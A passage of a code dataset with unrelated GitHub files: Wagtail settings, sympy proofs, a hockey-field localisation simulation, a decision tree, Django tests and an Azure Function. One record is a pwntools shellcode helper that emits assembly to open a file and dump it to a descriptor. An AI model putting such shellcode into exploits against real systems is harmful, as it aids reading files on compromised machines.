\"wagtail.search.backends.database\"}}\nWAGTAIL_I18N_ENABLED = False\nWAGTAILADMIN_COMMENTS_ENABLED = False\nWAGTAILIMAGES_MAX_UPLOAD_SIZE = 8 * 1024**2 # 8 MB\nWAGTAILADMIN_BASE_URL = f\"https://{VIRTUAL_HOST}\"\n\n# Tags\nTAGGIT_CASE_INSENSITIVE = True\n\n# Sets default for primary key IDs\n# See https://docs.djangoproject.com/en/4.1/ref/models/fields/#bigautofield\nDEFAULT_AUTO_FIELD = \"django.db.models.BigAutoField\"\n\n# logging\nLOGGING = {\n \"version\": 1,\n \"disable_existing_loggers\": False,\n \"formatters\": {\n \"verbose\": {\"format\": \"%(levelname)s %(asctime)s %(module)s %(message)s\"}\n },\n \"handlers\": {\n \"console\": {\n \"level\": \"DEBUG\",\n \"class\": \"logging.StreamHandler\",\n \"formatter\": \"verbose\",\n }\n },\n \"root\": {\"level\": \"INFO\", \"handlers\": [\"console\"]},\n}\n\n# sentry error reporter\nSENTRY_DSN = env.str(\"SENTRY_DSN\", default=None)\nif SENTRY_DSN: # sentry is configured\n import sentry_sdk\n from sentry_sdk.integrations.django import DjangoIntegration, RedisIntegration\n\n sentry_sdk.init(\n dsn=SENTRY_DSN,\n integrations=[DjangoIntegration(), RedisIntegration()],\n environment=ENVIRONMENT,\n traces_sample_rate=1.0,\n send_default_pii=True,\n )\n\n# S3 emdia baucket\nS3_MEDIA_BUCKET_URL = env.url(\"S3_MEDIA_BUCKET_URL\", default=None)\nif S3_MEDIA_BUCKET_URL:\n DEFAULT_FILE_STORAGE = \"storages.backends.s3boto3.S3Boto3Storage\"\n AWS_DEFAULT_ACL = \"public-read\"\n AWS_QUERYSTRING_AUTH = False\n AWS_PRIVATE_QUERYSTRING_AUTH = True\n AWS_ACCESS_KEY_ID = S3_MEDIA_BUCKET_URL.username\n AWS_SECRET_ACCESS_KEY = S3_MEDIA_BUCKET_URL.password\n AWS_STORAGE_BUCKET_NAME = S3_MEDIA_BUCKET_URL.path.strip(\"/\")\n AWS_PRIVATE_STORAGE_BUCKET_NAME = AWS_STORAGE_BUCKET_NAME\n AWS_QUERYSTRING_EXPIRE = 3600\n\n# develop environment settings\nif DEBUG:\n WAGTAIL_CACHE = False\n\n # enable debug toolbar if available\n try:\n import debug_toolbar\n finally:\n INSTALLED_APPS += [\"debug_toolbar\"]\n MIDDLEWARE += [\"debug_toolbar.middleware.DebugToolbarMiddleware\"]\n","repo_name":"roldaojr/cookiecutter-wagtail","sub_path":"{{ cookiecutter.project_slug }}/{{ cookiecutter.project_slug }}/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":8621,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"42433775655","text":"from util import *\n\n\n@apply\ndef apply(given):\n function, *limits = given.of(Any)\n limits = [(x,) for x, *_ in limits]\n limits[0] = (limits[0][0], function)\n return Any(given.limits_cond, *limits)\n\n\n@prove\ndef prove(Eq):\n from axiom import sets\n S = Symbol(etype=dtype.real)\n e, t = Symbol(real=True)\n f, g = Function(shape=(), integer=True)\n\n Eq << apply(Any[e:g(e) > 0](f(e) > 0))\n\n A = Symbol(conditionset(e, g(e) > 0))\n B = Symbol(conditionset(e, f(e) > 0))\n\n Eq.A_definition = A.this.definition\n Eq.B_definition = B.this.definition\n\n Eq << Any[e:A](Element(e, B), plausible=True)\n\n Eq << Eq[-1].this.expr.rhs.definition\n\n Eq << Eq[-1].subs(Eq.A_definition)\n\n Eq << sets.any_el.imply.any_el.limits.swap.apply(Eq[2], simplify=False)\n\n Eq << Eq[-1].this.expr.rhs.definition\n\n Eq << Eq[-1].subs(Eq.B_definition)\n\n\nif __name__ == '__main__':\n run()\n\n# created on 2020-09-05\n","repo_name":"cosmosZhou/sympy","sub_path":"axiom/sets/any/imply/any/limits/swap.py","file_name":"swap.py","file_ext":"py","file_size_in_byte":933,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"83"} +{"seq_id":"34453428133","text":"from pwn.internal.shellcode_helper import *\nfrom open_file import open_file\nfrom sendfile import sendfile\nfrom read_stack import read_stack\nfrom write_stack import write_stack\n\n@shellcode_reqs(arch=['i386', 'amd64', 'arm'], os=['linux', 'freebsd'])\ndef cat(filepath, out_fd = 1, use_sendfile = False, os = None, arch = None):\n \"\"\"Args: filepath, [out_fd (imm/reg) = STDOUT_FILENO] [use_sendfile]\n\n Opens a file and writes it to the specified file descriptor.\n\n Set use_sendfile to True to use the sendfile syscall instead of a read+write loop.\n This causes the shellcode to be slightly smaller.\n \"\"\"\n\n if arch == 'i386':\n if os in ['linux', 'freebsd']:\n return _cat_i386(filepath, out_fd, use_sendfile)\n elif arch == 'amd64':\n if os in ['linux', 'freebsd']:\n return _cat_amd64(filepath, out_fd, use_sendfile)\n elif arch == 'arm' and os == 'linux':\n return _cat_linux_arm(filepath, out_fd)\n\n no_support('cat', os, arch)\n\ndef _cat_i386(filepath, out_fd, use_sendfile):\n if use_sendfile:\n return open_file(filepath), sendfile('eax', out_fd)\n else:\n return (open_file(filepath),\n \"xchg ebp, eax\\ncat_helper1:\",\n read_stack('ebp', 48, False),\n \"test eax, eax\\njle cat_helper2\",\n write_stack(out_fd, 'eax'),\n \"jmp cat_helper1\\ncat_helper2:\")\n\ndef _cat_amd64(filepath, out_fd, use_sendfile):\n if use_sendfile:\n return open_file(filepath), sendfile('rax', out_fd)\n else:\n return (open_file(filepath),\n \"xchg ebp, eax\\ncat_helper1:\",\n read_stack('rbp', 48, False),\n \"test eax, eax\\njle cat_helper2\",\n write_stack(out_fd, 'rax'),\n \"jmp cat_helper1\\ncat_helper2:\")\n\ndef _cat_linux_arm(filepath, out_fd):\n return (open_file(filepath),\n 'mov r8, r0\\ncat_helper1:',\n read_stack('r8', 48, False),\n 'cmp r0, #0\\nble cat_helper2',\n write_stack(out_fd, 'r0'),\n 'b cat_helper1\\ncat_helper2:')\n","repo_name":"Haabb/pwnfork","sub_path":"pwn/shellcode/io/cat.py","file_name":"cat.py","file_ext":"py","file_size_in_byte":2082,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"83"} +{"seq_id":"20585996466","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib \nfrom matplotlib.animation import FuncAnimation\nimport matplotlib.animation as animation\nimport PIL as pl\nfrom shapely.geometry import Polygon\nfrom shapely.geometry import Point\nfrom shapely.ops import cascaded_union\nfrom itertools import combinations\nfrom scipy import interpolate\n\n#TODO\n# Simulate with discrete steps in receiver resolution\nsave = 1\n\nheatmap_on = 0\npixel_res = 5\ncone_plot = 0\n\nanimation_on = 0\n\n# Uncertainty of the direction of nodes\nres_angle = 5\nres_angle_arr = np.arange(0, 181-res_angle, res_angle)\n\nscat_width = 3\nmarksize = 4\n\nres_angle_rad = res_angle/360*2*np.pi\n\ncorner_point_coordinates = np.array([[480,780],[22,774],[28,391],[37,11],[495,16]])\nsweep_first_point_coordinates = np.array([[-1200,600],[-300, -900],[500, -7300],[900,-50],[800, 1000]])\n\nTx_coordinates = np.array([340,410])\n\nhockey_field_width = 55\nhockey_field_height = 45.8*2\nnormalization_factor = hockey_field_width/458\nsize_hockey_field = hockey_field_width*hockey_field_height\n\ndef pixels_to_metres(pixels):\n return pixels*normalization_factor\ndef metres_to_pixels(metres):\n return metres*(1/normalization_factor)\n\ndef pixels_to_metres_sqrt(pixels):\n return pixels*normalization_factor**2\n\nfig, ax = plt.subplots()\nimg = plt.imread(\"hockey_field_edit.png\")\n\nxlim_img = img.shape[1]\nylim_img = img.shape[0]\nif cone_plot:\n plt.scatter(corner_point_coordinates[2,0],corner_point_coordinates[2,1],marker = \"2\",clip_on = True, label = 'TRx position',zorder = 2,linewidths=scat_width, s = 20*2**marksize)\nelse:\n plt.scatter(corner_point_coordinates[:,0],corner_point_coordinates[:,1],marker = \"2\",clip_on = True, label = 'TRx position',zorder = 2,linewidths=scat_width, s = 20*2**marksize)\n\nplt.xlim( 0,xlim_img)\nplt.ylim( 0,ylim_img)\nax.set_ylim(ax.get_ylim()[::-1])\n\nax.imshow(img)\nfig.set_size_inches(11, 7)\n\nhockey_field_width = 55\n\nchar_arr = [\"B\",\"C\",\"E\",\"F\",\"G\"]\npol_tri_plot = {}\ntriangle = {}\ntri_area_calc = {}\ncertain_area_plot = []\nTx_plot = []\nselect_triangles = {}\nframe_number = ax.text(50,100, \"\", fontsize=15)\n\ndef update_triangles():\n if len(ax.lines) != 0:\n for k in range(0,len(char_arr)):\n ax.patches[0].remove()\n ax.lines[0].remove()\n ax.collections[1].remove()\n\n cur_node =corner_point_coordinates[1,:]\n first_point = np.array([-200,-500]) + cur_node\n # Raster of detection triangles for each node\n for j in char_arr:\n cur_node = corner_point_coordinates[char_arr.index(j)]\n first_point = sweep_first_point_coordinates[char_arr.index(j),:] + cur_node\n for k in res_angle_arr:\n \n first_point_vec = first_point - cur_node\n #sec_point = np.array([np.tan(res_angle_rad)*first_point_vec[0], -pow(first_point_vec[0],2)*np.tan(res_angle_rad)/first_point_vec[1] ])\n sec_point = np.array([(first_point_vec[1]*np.tan(res_angle_rad/2)), -(first_point_vec[0]*np.tan(res_angle_rad/2))])\n #pol_tri = plt.Polygon([cur_node,cur_node+first_point_vec,sec_point+first_point_vec+cur_node],color='m', fill = True)\n pol_tri = Polygon([cur_node,cur_node+first_point_vec+sec_point, cur_node+first_point_vec-sec_point])\n if j == 'E' and cone_plot:\n if k == 0:\n fan_plot= plt.Polygon([cur_node,cur_node+first_point_vec+sec_point, cur_node+first_point_vec-sec_point],color='m', fill = True, alpha =0.35,label = 'Angle bin')\n else:\n fan_plot= plt.Polygon([cur_node,cur_node+first_point_vec+sec_point, cur_node+first_point_vec-sec_point],color='m', fill = True, alpha =0.35)\n ax.add_patch(fan_plot)\n if pol_tri.contains(Point(Tx_coordinates[0],Tx_coordinates[1])):\n tri_area_calc[j] = pol_tri\n if j == 'B':\n pol_tri_plot = plt.Polygon([cur_node,cur_node+first_point_vec+sec_point, cur_node+first_point_vec-sec_point],color='b', fill = True, alpha =0.3, label = 'Selected angle bin')\n else:\n pol_tri_plot = plt.Polygon([cur_node,cur_node+first_point_vec+sec_point, cur_node+first_point_vec-sec_point],color='b', fill = True, alpha =0.3)\n if not cone_plot:\n ax.add_patch(pol_tri_plot)\n rotate_origin = np.array([np.cos(res_angle_rad)*first_point_vec[0]-np.sin(res_angle_rad)*first_point_vec[1], np.sin(res_angle_rad)*first_point_vec[0] + np.cos(res_angle_rad)*first_point_vec[1] ])\n first_point = cur_node+rotate_origin\n\n # for j in char_arr:\n # current_node = corner_point_coordinates[char_arr.index(j)]\n # scale_factor = 100\n # Node_to_Tx_vec = (Tx_coordinates-current_node) * scale_factor\n\n # point_triangle = np.array([(Node_to_Tx_vec[1]*np.tan(res_angle_rad/2)), -(Node_to_Tx_vec[0]*np.tan(res_angle_rad/2))])\n # triangle[j] = plt.Polygon( [current_node, point_triangle+Node_to_Tx_vec+current_node, -point_triangle+Node_to_Tx_vec+current_node], color='b', fill = True, alpha =0.3)\n \n # tri_area_calc[j] = Polygon([current_node,point_triangle+Node_to_Tx_vec+current_node,-point_triangle+Node_to_Tx_vec+current_node])\n\n # #ax.add_patch(triangle[j])\n\n intersect = tri_area_calc[\"B\"]\n def intersection(shape1, shape2):\n return shape1.intersection(shape2)\n\n for j in tri_area_calc:\n intersect = intersection(intersect, tri_area_calc[j])\n\n if not cone_plot:\n certain_area_plot = ax.plot(*intersect.exterior.xy,label = 'Tx estimated area', color = 'r')\n certain_area = intersect.area\n\n #print(\"Area where Tx is with 100% certainty: \" + str(pixels_to_metres_sqrt(certain_area))+ \"m^2, hockey field is \" + str(size_hockey_field)+\"m^2\")\n #print(\"Which is \" + str(pixels_to_metres_sqrt(certain_area)/size_hockey_field*100)+ \"% of the entire field\")\n if not cone_plot:\n Tx_plot = ax.scatter(Tx_coordinates[0],Tx_coordinates[1] ,marker=\"x\", color = 'silver', label = 'Tx real position',zorder = 2,linewidths=scat_width, s = 50)\n if heatmap_on:\n return pixels_to_metres_sqrt(certain_area)\n else:\n return \n\ndef init():\n # ax.imshow(img)\n # frame_number.set_text(\"0\")\n # ax.legend(loc='upper center', bbox_to_anchor=(0.5, 1.1),\n # ncol=3, fancybox=True)\n # ax.legend()\n return ax, # this part seems to be the problem to return the white plots\n\ndef update(frame):\n # Draw the circles which relate the RSSI to distance \n # for j in char_arr:\n # circle[j].radius = distance_normalized[j][frame]\n # frame_number.set_text(frame)\n global Tx_coordinates \n x = 250 + 200 * np.sin(np.radians(frame))\n y = 400 + 200 * np.cos(np.radians(frame))\n #Tx_coordinates = Tx_coordinates + np.array([x,y])\n Tx_coordinates = np.array([x,y])\n \n #Tx, c_area, Tri = update_triangles()\n update_triangles()\n return ax,\n\ndist_node_hm = 25\nheatmap_xmin = np.min(corner_point_coordinates[:,0])+dist_node_hm\nheatmap_ymin = np.min(corner_point_coordinates[:,1])+dist_node_hm\nheatmap_xmax = np.max(corner_point_coordinates[:,0])-dist_node_hm\nheatmap_ymax = np.max(corner_point_coordinates[:,1])-dist_node_hm\nheatmap_data = np.empty((img.shape[1],img.shape[0]))\nheatmap_data[:] = np.nan\n\n\nif animation_on:\n ani = FuncAnimation(fig, update, frames=600, interval = 10,init_func=init, blit=True, repeat = False)\n #update_triangles()\n #matplotlib.rcParams['animation.ffmpeg_path'] = \"C:\\\\Users\\\\s153480\\\\Desktop\\\\ffmpeg-2022-11-03-git-5ccd4d3060-full_build\\\\bin\\\\ffmpeg.exe\"\n #writer = animation.FFMpegWriter(fps=24, metadata=dict(artist='Me'))\n #ani.save('Hockey_field_simulation.mp4', writer = writer)\nelif heatmap_on:\n Tx_coordinates = np.array([heatmap_xmin,heatmap_ymin])\n for k in range(heatmap_xmin,heatmap_xmax):\n for j in range(heatmap_ymin,heatmap_ymax):\n if (j-heatmap_ymin) % pixel_res ==0 and (k-heatmap_xmin) % pixel_res == 0:\n heatmap_data[k][j] = update_triangles()\n Tx_coordinates = Tx_coordinates + np.array([0,1])\n Tx_coordinates = Tx_coordinates - np.array([0,heatmap_ymax-heatmap_ymin]) + np.array([1,0])\n \n # Removing triangle lines\n for k in range(0,len(char_arr)):\n ax.patches[0].remove()\n ax.lines[0].remove()\n ax.collections[1].remove()\n\n plt.imshow(np.transpose(heatmap_data), cmap='jet', interpolation='nearest', label = \"Minimal search area [m$^2$]\")\n clrbar = plt.colorbar()\n clrbar.ax.set_ylabel('Size of search area [m$^2]$')\n for item in ([clrbar.ax.yaxis.label] + clrbar.ax.get_yticklabels()):\n item.set_fontsize(16)\nelse:\n update_triangles()\n \n\n\nxax_name_list = np.array([0,10,20,30,40,50,60])\nxax_val_list = metres_to_pixels(xax_name_list)\n\nax.xaxis.set_major_locator(matplotlib.ticker.FixedLocator((xax_val_list)))\nax.xaxis.set_major_formatter(matplotlib.ticker.FixedFormatter((xax_name_list)))\n\nax.set_ylim(ax.get_ylim()[::-1])\n\nyax_name_list = np.array([0,10,20,30,40,50,60,70,80,90,100,110])\nyax_val_list = metres_to_pixels(yax_name_list)\n\nax.yaxis.set_major_locator(matplotlib.ticker.FixedLocator((yax_val_list)))\nax.yaxis.set_major_formatter(matplotlib.ticker.FixedFormatter((yax_name_list)))\n\n\nax.set_xlabel('X coordinates [m]')\nax.set_ylabel('Y coordinates [m]')\n\n\nfor item in ([ax.title, ax.xaxis.label, ax.yaxis.label] + \n ax.get_xticklabels() + ax.get_yticklabels()):\n item.set_fontsize(16)\n\n#ax.legend(fontsize = 16)\n\nif cone_plot:\n ax.legend(loc='upper center', bbox_to_anchor=(0.5, 1),fontsize = 13,framealpha=1)\n plt.show()\n fig.savefig(\"Cone_bin_example.png\",bbox_inches='tight', format = 'png')\n\nif save and not heatmap_on:\n ax.legend(loc='upper center', bbox_to_anchor=(0.5, 1.12),fontsize = 13,framealpha=1)\n plt.show()\n fig.savefig(\"Cones_example_hockey_field_v3.png\",bbox_inches='tight', format = 'png')\n fig.savefig(\"Cones_example_hockey_field_v3.eps\",bbox_inches='tight', format = 'eps')\nelif save and heatmap_on:\n ax.legend(loc='upper center', bbox_to_anchor=(0.5, 1.0),fontsize = 13,framealpha=1)\n plt.show()\n fig.savefig(\"Heatmap_hockey_field_v3.png\",bbox_inches='tight', format = 'png')\n fig.savefig(\"Heatmap_hockey_field_v3.eps\",bbox_inches='tight', format = 'eps')\n\n\nprint('end')","repo_name":"awjvankast/Graduation-project","sub_path":"VScode/Python/hockey_field_simulation.py","file_name":"hockey_field_simulation.py","file_ext":"py","file_size_in_byte":10331,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"83"} +{"seq_id":"42433990855","text":"from util import *\n\n\n@apply\ndef apply(self):\n from axiom.algebra.all.doit.inner.setlimit import doit\n return Equal(self, doit(Cup, self))\n\n\n@prove\ndef prove(Eq):\n from axiom import sets\n\n x = Symbol(etype=dtype.real, shape=(oo, oo))\n i, j, a, b, c, d = Symbol(integer=True)\n m = Symbol(integer=True, positive=True)\n Eq << apply(Cup[j:{a, b, c, d}, i:m](x[i, j]))\n\n s = Function(etype=dtype.real, eval=lambda i: Cup[j:{a, b, c, d}](x[i, j]))\n Eq << s(i).this.defun()\n\n Eq << sets.eq.imply.eq.cup.apply(Eq[-1], (i, 0, m))\n\n Eq << Eq[-2].this.rhs.apply(sets.cup.to.union.doit.setlimit)\n\n Eq << Eq[-2].subs(Eq[-1])\n\n Eq << Eq[-1].reversed\n\n \n\n\nif __name__ == '__main__':\n run()\n\n# created on 2021-02-05\n# updated on 2022-04-03\n","repo_name":"cosmosZhou/sympy","sub_path":"axiom/sets/cup/doit/inner/setlimit.py","file_name":"setlimit.py","file_ext":"py","file_size_in_byte":768,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"83"} +{"seq_id":"7261533461","text":"import numpy\nimport pandas\nimport utils\n\n\n# Example of building a tree\n# Split a dataset based on an attribute and an attribute value\ndef test_split(index, value, dataset):\n left, right = list(), list()\n for row in dataset:\n if row[index] < value:\n left.append(row)\n else:\n right.append(row)\n return left, right\n\n\n# Calculate the Gini index for a split dataset\ndef gini_index(groups, classes):\n # count all samples at split point\n n_instances = float(sum([len(group) for group in groups]))\n # sum weighted Gini index for each group\n gini = 0.0\n for group in groups:\n size = float(len(group))\n # avoid divide by zero\n if size == 0:\n continue\n score = 0.0\n # score the group based on the score for each class\n for class_val in classes:\n p = [row[-1] for row in group].count(class_val) / size\n score += p * p\n # weight the group score by its relative size\n gini += (1.0 - score) * (size / n_instances)\n return gini\n\n\n# Select the best split point for a dataset\ndef get_split(dataset):\n class_values = list(set(row[-1] for row in dataset))\n b_index, b_value, b_score, b_groups = 999, 999, 999, None\n for index in range(len(dataset[0]) - 1):\n print(f\"Característica: {get_feature(index)}\")\n for row in dataset:\n groups = test_split(index, row[index], dataset)\n gini = gini_index(groups, class_values)\n print(f\"Valor Gini en Row: {row} es {gini}\")\n if gini < b_score:\n b_index, b_value, b_score, b_groups = index, row[index], gini, groups\n return {'index': b_index, 'value': b_value, 'izq': b_groups[0], 'der': b_groups[1], 'groups': b_groups}\n\n\n# Create a terminal node value\ndef to_terminal(group):\n outcomes = [row[-1] for row in group]\n return max(set(outcomes), key=outcomes.count)\n\n\n# Create child splits for a node or make terminal\ndef split(node, max_depth, min_size, depth):\n left, right = node['groups']\n del (node['groups'])\n # check for a no split\n if not left or not right:\n node['left'] = node['right'] = to_terminal(left + right)\n return\n # check for max depth\n if depth >= max_depth:\n node['left'], node['right'] = to_terminal(left), to_terminal(right)\n return\n # process left child\n if len(left) <= min_size:\n node['left'] = to_terminal(left)\n else:\n node['left'] = get_split(left)\n split(node['left'], max_depth, min_size, depth + 1)\n # process right child\n if len(right) <= min_size:\n node['right'] = to_terminal(right)\n else:\n node['right'] = get_split(right)\n split(node['right'], max_depth, min_size, depth + 1)\n\n\n# Build a decision tree\ndef build_tree(train, max_depth, min_size):\n root = get_split(train)\n split(root, max_depth, min_size, 1)\n return root\n\n\ndef concatenate_dataset(X, y):\n dataset = None\n if isinstance(X, numpy.ndarray) or isinstance(X, list):\n dataset = pandas.DataFrame(X)\n if isinstance(y, numpy.ndarray) or isinstance(y, list):\n dataset = dataset.join(pandas.DataFrame(y, columns=['target'])['target'])\n return dataset.values.tolist()\n\n\ndef predict(node, row):\n if row[node['index']] < node['value']:\n if isinstance(node['left'], dict):\n return predict(node['left'], row)\n else:\n return node['left']\n else:\n if isinstance(node['right'], dict):\n return predict(node['right'], row)\n else:\n return node['right']\n\n\ndef get_feature(index):\n features = ['sepal-length', 'sepal-width', 'petal-length', 'petal-width']\n return features[index]\n\n\ndef print_tree(node, depth=0):\n if isinstance(node, dict):\n print('%s[%s < %.4f] División: izq: %i, der: %i' % (depth * ' ', (get_feature(node['index'])), node['value'], len(node['izq']), len(node['der'])))\n print_tree(node['left'], depth + 1)\n print_tree(node['right'], depth + 1)\n else:\n print('%s[%s]' % (depth * ' ', node))\n\n\nclass DecisionTreeStatic:\n def __init__(self, max_depth=1, min_size=1):\n self._X = None\n self._y = None\n self._dataset = None\n self._root = None\n self._max_depth = max_depth\n self._min_size = min_size\n\n def fit(self, X, y):\n self._X = X\n self._y = y\n self._dataset = concatenate_dataset(self._X, self._y)\n self._root = build_tree(self._dataset, self._max_depth, self._min_size)\n return self._root\n\n def score(self, X, y):\n X = utils.validate_type(X)\n y = utils.validate_type(y)\n correct = 0\n index = 0\n for row in X:\n prediction = self.predict(row)\n if y[index] == prediction:\n correct += 1\n index += 1\n return correct / float(len(X)) * 100.00\n\n def __sklearn_is_fitted__(self):\n return True\n\n def _predict(self, node, row):\n if row[node['index']] < node['value']:\n if isinstance(node['left'], dict):\n return self._predict(node['left'], row)\n else:\n return node['left']\n else:\n if isinstance(node['right'], dict):\n return self._predict(node['right'], row)\n else:\n return node['right']\n\n def predict(self, X):\n node = self._root\n X = utils.validate_type(X)\n if isinstance(X[0], list): # is list of list\n prediction_list = list()\n for row in X:\n prediction_list.append(self._predict(node, row))\n return numpy.asarray(prediction_list)\n else:\n return numpy.asarray(self._predict(node, X))\n","repo_name":"miguelangelmanuttupaligas/developmentDecisionTree","sub_path":"decisiontree/demo2.py","file_name":"demo2.py","file_ext":"py","file_size_in_byte":5796,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"72113681550","text":"from rest_framework.test import APITestCase\nfrom rest_framework import status\nfrom rest_framework.test import APIClient\nfrom django.utils import timezone\nfrom .models import User, Track\n\n\nclass TrackTestCase(APITestCase):\n def setUp(self):\n self.user = User.objects.create_user(\"test\", \"test@gmail.com\", \"P@$$w0rd\", is_active=True)\n data = {\"email\": \"test@gmail.com\", \"password\": \"P@$$w0rd\"}\n self.token_jwt = self.get_token(data)\n self.client = APIClient()\n\n def get_token(self, data):\n # Get Access JWT Bearer\n response = self.client.post('/auth/jwt/create/', data)\n self.assertEquals(response.status_code, status.HTTP_200_OK)\n return response.data.get(\"access\")\n\n def test_should_add_track(self, token=None):\n if token is None:\n token = self.token_jwt\n self.client.credentials(HTTP_AUTHORIZATION='Bearer ' + token)\n data = {'time_start': timezone.now(), 'time_finish': timezone.now(), 'duration': 100, 'track_length': 1.43}\n response = self.client.post(\"/api/my-tracks/\", data)\n self.assertEquals(response.status_code, status.HTTP_201_CREATED)\n\n def test_should_not_add_track(self):\n first_time = timezone.now()\n bad_finish_time = first_time - timezone.timedelta(days=100)\n self.client.credentials(HTTP_AUTHORIZATION='Bearer ' + self.token_jwt)\n data = {'time_start': first_time, 'time_finish': bad_finish_time, 'duration': 100, 'track_length': 1.43}\n response = self.client.post(\"/api/my-tracks/\", data)\n self.assertEquals(response.status_code, status.HTTP_400_BAD_REQUEST)\n # self.assertContains(response.data.get('non_field_errors')[0][0], \"Koniec musi wystąpić po starcie!\")\n\n def test_should_get_my_tracks(self):\n # Add track\n self.test_should_add_track(self.token_jwt)\n self.client.credentials(HTTP_AUTHORIZATION='Bearer ' + self.token_jwt)\n response = self.client.get(\"/api/my-tracks/\")\n self.assertEquals(response.status_code, status.HTTP_200_OK)\n self.assertEquals(len(response.data), 1)\n\n def test_should_return_details(self):\n self.test_should_add_track(self.token_jwt)\n self.client.credentials(HTTP_AUTHORIZATION='Bearer ' + self.token_jwt)\n response = self.client.get(\"/api/track/1\")\n self.assertEquals(response.status_code, status.HTTP_200_OK)\n self.assertEquals(response.data.get('user'), Track.objects.get(pk=1).user_id)\n\n def test_should_not_return_details(self):\n self.test_should_add_track(self.token_jwt)\n self.client.credentials(HTTP_AUTHORIZATION='Bearer ' + self.token_jwt)\n response = self.client.get(\"/api/track/2\")\n self.assertEquals(response.status_code, status.HTTP_404_NOT_FOUND)\n\n def test_should_get_other_user_track(self):\n # Create second user and add him a track\n self.user_2 = User.objects.create_user(\"test2\", \"test2@gmail.com\", \"P@$$w0rd2\", is_active=True)\n data = {\"email\": \"test2@gmail.com\", \"password\": \"P@$$w0rd2\"}\n token_jwt_2 = self.get_token(data)\n self.test_should_add_track(token_jwt_2)\n\n # Find a user_2 tracks as main user\n self.client.credentials(HTTP_AUTHORIZATION='Bearer ' + self.token_jwt)\n response = self.client.get(\"/api/tracks/?id=2\")\n self.assertEquals(response.status_code, status.HTTP_200_OK)\n","repo_name":"DanielSzarek/HulApp","sub_path":"backend/backend/track/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":3401,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"83"} +{"seq_id":"34444265831","text":"\ndef del_source_one():\n one = {}.fromkeys(range(1,13368))\n list = []\n list_source = []\n for i in one:\n one[i]=0\n with open('../../data/Douban_Movie/user_movie.dat','r') as f:\n for line in f.readlines():\n list_source.append(line)\n line = int(str(line.strip().split()[0]))\n one[line]=one[line]+1\n f.close()\n\n for i in one:\n if one[i] == 1:\n list.append(i)\n print (len(list))\n for i in list:\n one.pop(i)\n print(len(one))\n\n with open('../../data/Douban_Movie/user_movie_process.dat','w') as f_new:\n for i in list_source:\n temp = int(str(i.strip().split()[0]))\n if temp not in list:\n f_new.write(i)\n f_new.close()\n\ndef del_moive_type():\n one = {}.fromkeys(range(1,12678))\n for i in one:\n one[i]=0\n with open('../../data/Douban_Movie/embeddings/mtm_0.8.embedding','r') as f:\n for line in f.readlines():\n if len(line.strip('\\n').split())==2:\n pass\n else:\n line = int(str(line.strip().split()[0]))\n one[line]=one[line]+1\n f.close()\n\n for i in one:\n if one[i] !=1:\n print(i)\n\ndef del_user_embedding():\n one = {}.fromkeys(range(1,12678))\n for i in one:\n one[i]=0\n with open('../../data/Douban_Movie/embeddings/mtm_0.8.embedding','r') as f:\n for line in f.readlines():\n if len(line.strip('\\n').split())==2:\n pass\n else:\n line = int(str(line.strip().split()[0]))\n one[line]=one[line]+1\n f.close()\n\n for i in one:\n if one[i] !=1:\n print(i)\n#del_source_one()\n#del_moive_type()\ndel_user_embedding()\n","repo_name":"izhaojinlong/My_rec","sub_path":"HERec/ncf_modify/src/douban_process.py","file_name":"douban_process.py","file_ext":"py","file_size_in_byte":1764,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"71734781392","text":"#exC\ndef main():\n locais = {}\n\n locais['34242'] = ['Rua das Flores']\n locais['12343'] = ['Rua dos nerds']\n locais['5433'] = ['Rua dos jogadores']\n locais['87686'] = ['Rua dos cataventos']\n\n #for i in locais.keys():\n # print (i)\n\n if '123143' in locais.keys():\n print(\"Esse CEP já está cadastrado!\")\n else:\n print(\"Esse CEP NÃO está cadastrado!\")\n\n for i in locais.values():\n if 'Rua dos cataventos' in i:\n print(\"Esse endereço já está cadastrado!\")\n \n\nmain()\n","repo_name":"Alinemm/ed20201","sub_path":"Aula06-Dicionarios/exercicioC.py","file_name":"exercicioC.py","file_ext":"py","file_size_in_byte":497,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"83"} +{"seq_id":"72067811792","text":"import azure.functions as func\nfrom PlayFabUtil.Admin.profile import PROFILE\nfrom PlayFabUtil.User.authorize import AUTHORIZE\nfrom Security import authorize_check\nfrom HttpMessageHandling import request_validation, response_handler, request_model\nimport logging\n\nclass GET_ACCOUNT_INFO_DTO:\n def __init__(self, playfab_id: str = None, ignore_missing_title_activation: bool = None) -> None:\n self.PlayFabId = playfab_id\n self.IgnoreMissingTitleActivation = ignore_missing_title_activation\n\ndef main(req: func.HttpRequest, context: func.Context) -> func.HttpResponse:\n if not request_validation.is_valid_json(req, context):\n return response_handler.send_invalid_json_response()\n req_body = req.get_json()\n is_x_auth_header = authorize_check.is_contain_x_auth_header(req)\n if not is_x_auth_header:\n return response_handler.send_unauth_response()\n x_auth_header = authorize_check.get_x_auth(req)\n authorize = AUTHORIZE(\n session_ticket = x_auth_header\n )\n if not authorize.is_valid_session_ticket():\n return response_handler.send_unauth_response()\n playfab_id = authorize.get_playfab_id_from_entity_id()\n # request_dto = request_model.COMMON_REQUEST_DTO(\n # key_id = req_body.get('KeyId'),\n # data = req_body.get('Data')\n # )\n request_dto = request_model.NO_DATA_REQUEST_DTO(\n key_id = req_body.get('KeyId')\n )\n is_missing_param, missing_key = request_validation.is_missing_param(request_dto)\n if is_missing_param:\n return response_handler.send_missing_params_response(missing_key)\n # decrypted_json_object = request_handler.decrypt(request_dto)\n # playfab_get_acc_info_dto = GET_ACCOUNT_INFO_DTO(\n # playfab_id = decrypted_json_object.get('PlayFabId')\n # )\n # is_missing_param, missing_key = request_validation.is_missing_param(playfab_get_acc_info_dto)\n # if is_missing_param:\n # return 